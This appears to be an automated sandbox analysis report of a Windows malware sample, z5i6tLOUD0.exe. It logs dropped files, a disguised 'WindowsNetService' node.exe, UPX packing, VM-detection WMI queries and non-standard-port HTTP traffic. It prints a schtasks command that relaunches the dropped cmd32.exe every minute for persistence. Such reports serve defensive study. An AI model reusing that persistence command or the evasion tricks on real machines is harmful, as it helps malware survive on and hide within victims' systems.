          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_004034A5
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeFile created: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00402104 CoCreateInstance,20_2_00402104
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC1A8C GetDiskFreeSpaceW,18_2_03AC1A8C
          Source: z5i6tLOUD0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1952:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2684:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4688:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4264:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:956:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1276:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2744:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4968:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4896:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4948:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3244
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4444:120:WilError_01
          Source: z5i6tLOUD0.exe, u0097u0011/u009du0011.csCryptographic APIs: 'CreateDecryptor'
          Source: z5i6tLOUD0.exe, u0097u0011/u009du0011.csCryptographic APIs: 'TransformFinalBlock'
          Source: z5i6tLOUD0.exe, u0097u0011/u009du0011.csCryptographic APIs: 'TransformFinalBlock'
          Source: cmd32.exe.3.dr, u0097u0011/u009du0011.csCryptographic APIs: 'CreateDecryptor'
          Source: cmd32.exe.3.dr, u0097u0011/u009du0011.csCryptographic APIs: 'TransformFinalBlock'
          Source: cmd32.exe.3.dr, u0097u0011/u009du0011.csCryptographic APIs: 'TransformFinalBlock'
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\WindowsNetService\node.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files (x86)\WindowsNetService\node.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpWindow found: window name: TSelectLanguageFormJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: Next >
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAutomated click: I accept the agreement
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: z5i6tLOUD0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: z5i6tLOUD0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: z5i6tLOUD0.exeStatic file information: File size 21082624 > 1048576
          Source: z5i6tLOUD0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1417c00
          Source: z5i6tLOUD0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220912_171757_809.etl.16.dr
          Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp "C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe"
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp "C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03B74B7A push edx; retf 0_2_03B74B7B
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03B749B6 push esp; retf 0_2_03B749B8
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03B735C8 push ds; iretd 0_2_03B735CE
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03B74CCE push ecx; retf 0_2_03B74CCF
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC33FC push ecx; mov dword ptr [esp], ecx18_2_03AC33FF
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03B053D4 push ecx; mov dword ptr [esp], ecx18_2_03B053D8
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC33D8 push ecx; mov dword ptr [esp], ecx18_2_03AC33DB
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADE3D4 push ecx; mov dword ptr [esp], eax18_2_03ADE3D6
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC033C push ecx; mov dword ptr [esp], edx18_2_03AC033E
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AAB368 push ecx; mov dword ptr [esp], edx18_2_03AAB369
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AD9354 push ecx; mov dword ptr [esp], eax18_2_03AD9355
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AB92B8 push 03AB92F0h; ret 18_2_03AB92E8
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AB02D8 push 03AB035Bh; ret 18_2_03AB0353
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AA71B0 push ecx; mov dword ptr [esp], eax18_2_03AA71B1
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03B0617C push ecx; mov dword ptr [esp], eax18_2_03B0617D
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AAE164 push ecx; mov dword ptr [esp], eax18_2_03AAE169
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC60C8 push 03AC6156h; ret 18_2_03AC614E
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC1038 push ecx; mov dword ptr [esp], ecx18_2_03AC103C
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AD77A4 push ecx; mov dword ptr [esp], edx18_2_03AD77A7
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADD750 push ecx; mov dword ptr [esp], edx18_2_03ADD751
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03B096B0 push ecx; mov dword ptr [esp], ecx18_2_03B096B4
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ACF6A8 push 03ACF7ACh; ret 18_2_03ACF7A4
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AAF56C push ecx; mov dword ptr [esp], edx18_2_03AAF56D
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC3564 push ecx; mov dword ptr [esp], ecx18_2_03AC3565
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AD2570 push ecx; mov dword ptr [esp], edx18_2_03AD2572
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC34AC push ecx; mov dword ptr [esp], ecx18_2_03AC34AD
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ACEB24 push ecx; mov dword ptr [esp], eax18_2_03ACEB25
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03B08B0C push ecx; mov dword ptr [esp], ecx18_2_03B08B11
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03B08AA0 push ecx; mov dword ptr [esp], eax18_2_03B08AA2
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ACEAF4 push ecx; mov dword ptr [esp], eax18_2_03ACEAF5
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AD28E0 push ecx; mov dword ptr [esp], edx18_2_03AD28E2
          Source: WingFtpServer.tmp.14.drStatic PE information: section name: .wtext
          Source: setuphelper.dll.18.drStatic PE information: section name: .didata
          Source: initial sampleStatic PE information: section where entry point is pointing to: .wtext
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeFile created: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile created: C:\Users\user\AppData\Local\Temp\wns22DB.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpFile created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpFile created: C:\Users\user\AppData\Local\Temp\nsz2A01.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpFile created: C:\Program Files (x86)\WindowsNetService\node.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeFile created: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\cmd32.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\setuphelper.dllJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\net.exe "net" stop windowsnetservicehelper.exe
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\sc.exe "sc" delete windowsnetservicehelper.exe
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC4964 RunService,OpenSCManagerW,OpenServiceW,StartServiceW,Sleep,TranslateMessage,DispatchMessageW,PeekMessageW,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,18_2_03BC4964

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6101
          Source: unknownNetwork traffic detected: HTTP traffic on port 6101 -> 49753
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
